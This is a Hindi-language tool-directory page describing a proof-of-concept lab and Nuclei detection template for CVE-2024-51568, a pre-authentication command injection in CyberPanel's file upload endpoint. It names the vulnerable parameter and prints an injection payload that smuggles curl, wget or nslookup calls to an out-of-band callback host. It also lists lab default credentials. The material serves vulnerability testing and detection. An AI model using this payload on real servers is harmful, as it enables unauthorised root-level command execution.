Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template — प्रूफ-ऑफ-कॉन्सेप्ट वातावरण और CVE-2024-51568 के परीक्षण के लिए Nuclei टेम्पलेट, जो CyberPanel में प्री-ऑथेंटिकेशन कमांड इंजेक्शन भेद्यता है, जिससे रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन संभव होता है। | Kitploit
उपकरण/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षालैब और अभ्यास
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

प्रूफ-ऑफ-कॉन्सेप्ट वातावरण और CVE-2024-51568 के परीक्षण के लिए Nuclei टेम्पलेट, जो CyberPanel में प्री-ऑथेंटिकेशन कमांड इंजेक्शन भेद्यता है, जिससे रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन संभव होता है।

रिपॉजिटरी देखें
11111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-51568 - CyberPanel कमांड इंजेक्शन PoC

CVE-2024-51568 के परीक्षण के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट वातावरण और Nuclei टेम्पलेट, जो CyberPanel में एक गंभीर प्री-ऑथेंटिकेशन कमांड इंजेक्शन भेद्यता है।

भेद्यता विवरण

  • CVE: CVE-2024-51568
  • गंभीरता: गंभीर (CVSS 9.8)
  • प्रकार: प्री-ऑथेंटिकेशन कमांड इंजेक्शन
  • एंडपॉइंट: /filemanager/upload
  • पैरामीटर: completePath
  • प्रभाव: रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन

त्वरित प्रारंभ

1. भेद्य वातावरण प्रारंभ करें

cd docker/
docker-compose up -d --build

2. सत्यापित करें कि CyberPanel चल रहा है

curl -I http://localhost:8090

3. भेद्यता का परीक्षण करें

nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

नमूना आउटपुट:

   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

यह कैसे काम करता है

भेद्यता

CyberPanel v2.3.4 में फ़ाइल अपलोड कार्यक्षमता में एक कमांड इंजेक्शन दोष है:

  1. एंडपॉइंट: POST /filemanager/upload
  2. पैरामीटर: मल्टीपार्ट फ़ॉर्म डेटा में completePath
  3. इंजेक्शन: कमांड ProcessUtilities.outputExecutioner() के माध्यम से निष्पादित होते हैं
  4. बायपास: मिडलवेयर बायपास के कारण कोई प्रमाणीकरण आवश्यक नहीं

Nuclei टेम्पलेट:

  1. प्रारंभिक GET अनुरोध से CSRF टोकन निकालता है
  2. completePath में इंजेक्टेड कमांड के साथ दुर्भावनापूर्ण फ़ाइल अपलोड भेजता है
  3. आउट-ऑफ-बैंड पहचान के लिए Interactsh का उपयोग करता है (HTTP/DNS कॉलबैक)
  4. जब सर्वर Interactsh URL से संपर्क करता है तो सफल निष्पादन का पता लगाता है

पहचान पेलोड

/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

यह पेलोड विभिन्न सिस्टम कॉन्फ़िगरेशनों में विश्वसनीय पहचान सुनिश्चित करता है।

कॉन्फ़िगरेशन

CyberPanel एक्सेस

  • URL: http://localhost:8090
  • एडमिन: admin
  • पासवर्ड: 1234567

संदर्भ

  • मूल अनुसंधान
  • Metasploit मॉड्यूल
  • CVE विवरण

सुरक्षा सूचना

इस वातावरण में सुरक्षा अनुसंधान और शिक्षा के लिए जानबूझकर भेद्यताएँ शामिल हैं:

  • उत्पादन में तैनात न करें
  • सार्वजनिक नेटवर्क पर उजागर न करें
  • उन सिस्टमों पर उपयोग न करें जिनके आप स्वामी नहीं हैं
  • केवल अधिकृत सुरक्षा परीक्षण के लिए उपयोग करें

अस्वीकरण

यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता लागू कानूनों का पालन करने और परीक्षण से पहले उचित प्राधिकरण प्राप्त करने के लिए ज़िम्मेदार हैं।

टूल डाउनलोड करें